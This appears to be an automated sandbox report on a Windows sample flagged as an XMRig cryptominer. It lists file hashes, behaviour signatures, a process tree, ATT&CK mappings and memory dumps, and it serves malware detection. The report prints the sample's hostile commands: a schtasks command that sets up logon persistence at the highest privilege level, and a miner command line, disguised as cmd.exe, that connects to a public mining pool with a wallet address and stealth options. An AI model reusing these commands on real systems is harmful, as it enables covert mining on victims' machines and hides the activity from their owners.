Analysis

  • max time kernel
    166s
  • max time network
    199s
  • platform
    windows7_x64
  • resource
    win7v20210408
  • submitted
    14-10-2021 05:08

General

  • Target

    342ef4f2941187bdc7f66d148be0ff75.exe

  • Size

    2.1MB

  • MD5

    342ef4f2941187bdc7f66d148be0ff75

  • SHA1

    7ff601a24c42ec01ef62c097927688a431c5aa76

  • SHA256

    046976da5783b0425976084bc16ababee1094e98a1f0648fc10c91dcf49bc395

  • SHA512

    84d9c5c7b83481e18efeecf8814bd050fd283dc1408a9a02fdc786ae2f8f08355ff87e24ab47a75e08291f0d75e8ae6747bb247e6a8859e8662d1999454605b2

Score
10/10

Malware Config

Signatures

  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • XMRig Miner Payload 12 IoCs
  • Blocklisted process makes network request 1 IoCs
  • Executes dropped EXE 2 IoCs
  • Loads dropped DLL 4 IoCs
  • Drops file in System32 directory 3 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 32 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of WriteProcessMemory 43 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\342ef4f2941187bdc7f66d148be0ff75.exe
    "C:\Users\Admin\AppData\Local\Temp\342ef4f2941187bdc7f66d148be0ff75.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1980
    • C:\Windows\System32\conhost.exe
      "C:\Windows\System32\\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\342ef4f2941187bdc7f66d148be0ff75.exe"
      2⤵
      • Drops file in System32 directory
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1128
      • C:\Windows\System32\cmd.exe
        "cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Windows\system32\services64.exe"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1520
        • C:\Windows\system32\schtasks.exe
          schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Windows\system32\services64.exe"
          4⤵
          • Creates scheduled task(s)
          PID:1612
      • C:\Windows\System32\cmd.exe
        "cmd" cmd /c "C:\Windows\system32\services64.exe"
        3⤵
        • Loads dropped DLL
        • Suspicious use of WriteProcessMemory
        PID:684
        • C:\Windows\system32\services64.exe
          C:\Windows\system32\services64.exe
          4⤵
          • Executes dropped EXE
          • Suspicious use of WriteProcessMemory
          PID:1068
          • C:\Windows\System32\conhost.exe
            "C:\Windows\System32\\conhost.exe" "C:\Windows\system32\services64.exe"
            5⤵
            • Loads dropped DLL
            • Drops file in System32 directory
            • Suspicious use of SetThreadContext
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:748
            • C:\Windows\system32\Microsoft\Libs\sihost64.exe
              "C:\Windows\system32\Microsoft\Libs\sihost64.exe"
              6⤵
              • Executes dropped EXE
              • Suspicious use of WriteProcessMemory
              PID:1652
              • C:\Windows\System32\conhost.exe
                "C:\Windows\System32\\conhost.exe" "/sihost64"
                7⤵
                  PID:1628
              • C:\Windows\System32\cmd.exe
                C:\Windows/System32\cmd.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=pool.supportxmr.com:5555 --user=44z5DkTXSYBfYECbt5TdQ2SUpyAQJmmGubyUsWqzcByeKwxwsWSZabZQMuE39hedNcTL15eK8kHrAeZMUdGGmHQHBzNH5db --pass=bandit --cpu-max-threads-hint=10 --cinit-stealth-targets="+iU/trnPCTLD3p+slbva5u4EYOS6bvIPemCHGQx2WRUcnFdomWh6dhl5H5KbQCjp6yCYlsFu5LR1mi7nQAy56B+5doUwurAPvCael2sR/N4=" --cinit-idle-wait=2 --cinit-idle-cpu=90 --cinit-stealth
                6⤵
                • Blocklisted process makes network request
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:1056

    Network

    MITRE ATT&CK Matrix ATT&CK v6

    Execution

    Scheduled Task

    1
    T1053

    Persistence

    Scheduled Task

    1
    T1053

    Privilege Escalation

    Scheduled Task

    1
    T1053

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Windows\System32\Microsoft\Libs\sihost64.exe
      MD5

      9eb9be816f6263b25bee3aa6038f58f9

      SHA1

      6c3ddf1e31c349515ea2bb7e417e888077bcdfec

      SHA256

      eec088b4b6f93002acab11f86b13e8bea3f179bb3b7008150da623d23bd6ec0e

      SHA512

      441d78848b8e1ecfa74bd37f512761d9fb43e2d46e88fb9f3791ec24a3fd3022176ba336e296f4d16f50340a3129db7ecb9770b3c7969365fa2e78ab370ea4ff

    • C:\Windows\System32\services64.exe
      MD5

      342ef4f2941187bdc7f66d148be0ff75

      SHA1

      7ff601a24c42ec01ef62c097927688a431c5aa76

      SHA256

      046976da5783b0425976084bc16ababee1094e98a1f0648fc10c91dcf49bc395

      SHA512

      84d9c5c7b83481e18efeecf8814bd050fd283dc1408a9a02fdc786ae2f8f08355ff87e24ab47a75e08291f0d75e8ae6747bb247e6a8859e8662d1999454605b2

    • C:\Windows\system32\services64.exe
      MD5

      342ef4f2941187bdc7f66d148be0ff75

      SHA1

      7ff601a24c42ec01ef62c097927688a431c5aa76

      SHA256

      046976da5783b0425976084bc16ababee1094e98a1f0648fc10c91dcf49bc395

      SHA512

      84d9c5c7b83481e18efeecf8814bd050fd283dc1408a9a02fdc786ae2f8f08355ff87e24ab47a75e08291f0d75e8ae6747bb247e6a8859e8662d1999454605b2

    • \Windows\System32\Microsoft\Libs\sihost64.exe
      MD5

      9eb9be816f6263b25bee3aa6038f58f9

      SHA1

      6c3ddf1e31c349515ea2bb7e417e888077bcdfec

      SHA256

      eec088b4b6f93002acab11f86b13e8bea3f179bb3b7008150da623d23bd6ec0e

      SHA512

      441d78848b8e1ecfa74bd37f512761d9fb43e2d46e88fb9f3791ec24a3fd3022176ba336e296f4d16f50340a3129db7ecb9770b3c7969365fa2e78ab370ea4ff

    • \Windows\System32\Microsoft\Libs\sihost64.exe
      MD5

      9eb9be816f6263b25bee3aa6038f58f9

      SHA1

      6c3ddf1e31c349515ea2bb7e417e888077bcdfec

      SHA256

      eec088b4b6f93002acab11f86b13e8bea3f179bb3b7008150da623d23bd6ec0e

      SHA512

      441d78848b8e1ecfa74bd37f512761d9fb43e2d46e88fb9f3791ec24a3fd3022176ba336e296f4d16f50340a3129db7ecb9770b3c7969365fa2e78ab370ea4ff

    • \Windows\System32\services64.exe
      MD5

      342ef4f2941187bdc7f66d148be0ff75

      SHA1

      7ff601a24c42ec01ef62c097927688a431c5aa76

      SHA256

      046976da5783b0425976084bc16ababee1094e98a1f0648fc10c91dcf49bc395

      SHA512

      84d9c5c7b83481e18efeecf8814bd050fd283dc1408a9a02fdc786ae2f8f08355ff87e24ab47a75e08291f0d75e8ae6747bb247e6a8859e8662d1999454605b2

    • \Windows\System32\services64.exe
      MD5

      342ef4f2941187bdc7f66d148be0ff75

      SHA1

      7ff601a24c42ec01ef62c097927688a431c5aa76

      SHA256

      046976da5783b0425976084bc16ababee1094e98a1f0648fc10c91dcf49bc395

      SHA512

      84d9c5c7b83481e18efeecf8814bd050fd283dc1408a9a02fdc786ae2f8f08355ff87e24ab47a75e08291f0d75e8ae6747bb247e6a8859e8662d1999454605b2

    • memory/684-69-0x0000000000000000-mapping.dmp
    • memory/748-84-0x000000001B1D7000-0x000000001B1D8000-memory.dmp
      Filesize

      4KB

    • memory/748-83-0x000000001B1D6000-0x000000001B1D7000-memory.dmp
      Filesize

      4KB

    • memory/748-81-0x000000001B1D2000-0x000000001B1D4000-memory.dmp
      Filesize

      8KB

    • memory/748-82-0x000000001B1D4000-0x000000001B1D6000-memory.dmp
      Filesize

      8KB

    • memory/1056-85-0x0000000140000000-0x0000000140763000-memory.dmp
      Filesize

      7.4MB

    • memory/1056-100-0x0000000140000000-0x0000000140763000-memory.dmp
      Filesize

      7.4MB

    • memory/1056-101-0x0000000000450000-0x0000000000470000-memory.dmp
      Filesize

      128KB

    • memory/1056-102-0x0000000000470000-0x0000000000490000-memory.dmp
      Filesize

      128KB

    • memory/1056-99-0x00000000002E0000-0x0000000000300000-memory.dmp
      Filesize

      128KB

    • memory/1056-98-0x00000001402F327C-mapping.dmp
    • memory/1056-97-0x0000000140000000-0x0000000140763000-memory.dmp
      Filesize

      7.4MB

    • memory/1056-96-0x0000000140000000-0x0000000140763000-memory.dmp
      Filesize

      7.4MB

    • memory/1056-95-0x0000000140000000-0x0000000140763000-memory.dmp
      Filesize

      7.4MB

    • memory/1056-94-0x0000000140000000-0x0000000140763000-memory.dmp
      Filesize

      7.4MB

    • memory/1056-93-0x0000000140000000-0x0000000140763000-memory.dmp
      Filesize

      7.4MB

    • memory/1056-86-0x0000000140000000-0x0000000140763000-memory.dmp
      Filesize

      7.4MB

    • memory/1056-87-0x0000000140000000-0x0000000140763000-memory.dmp
      Filesize

      7.4MB

    • memory/1056-88-0x0000000140000000-0x0000000140763000-memory.dmp
      Filesize

      7.4MB

    • memory/1056-89-0x0000000140000000-0x0000000140763000-memory.dmp
      Filesize

      7.4MB

    • memory/1056-90-0x0000000140000000-0x0000000140763000-memory.dmp
      Filesize

      7.4MB

    • memory/1056-91-0x0000000140000000-0x0000000140763000-memory.dmp
      Filesize

      7.4MB

    • memory/1056-92-0x0000000140000000-0x0000000140763000-memory.dmp
      Filesize

      7.4MB

    • memory/1068-73-0x0000000000000000-mapping.dmp
    • memory/1128-64-0x0000000002472000-0x0000000002474000-memory.dmp
      Filesize

      8KB

    • memory/1128-63-0x0000000000210000-0x000000000041C000-memory.dmp
      Filesize

      2.0MB

    • memory/1128-65-0x0000000002474000-0x0000000002476000-memory.dmp
      Filesize

      8KB

    • memory/1128-66-0x0000000002476000-0x0000000002477000-memory.dmp
      Filesize

      4KB

    • memory/1128-67-0x0000000002477000-0x0000000002478000-memory.dmp
      Filesize

      4KB

    • memory/1128-60-0x000000001B330000-0x000000001B538000-memory.dmp
      Filesize

      2.0MB

    • memory/1520-62-0x0000000000000000-mapping.dmp
    • memory/1612-68-0x0000000000000000-mapping.dmp
    • memory/1628-106-0x0000000000202000-0x0000000000204000-memory.dmp
      Filesize

      8KB

    • memory/1628-103-0x0000000000280000-0x0000000000282000-memory.dmp
      Filesize

      8KB

    • memory/1628-105-0x0000000000060000-0x0000000000066000-memory.dmp
      Filesize

      24KB

    • memory/1628-107-0x0000000000204000-0x0000000000206000-memory.dmp
      Filesize

      8KB

    • memory/1628-108-0x0000000000206000-0x0000000000207000-memory.dmp
      Filesize

      4KB

    • memory/1628-109-0x0000000000207000-0x0000000000208000-memory.dmp
      Filesize

      4KB

    • memory/1652-79-0x0000000000000000-mapping.dmp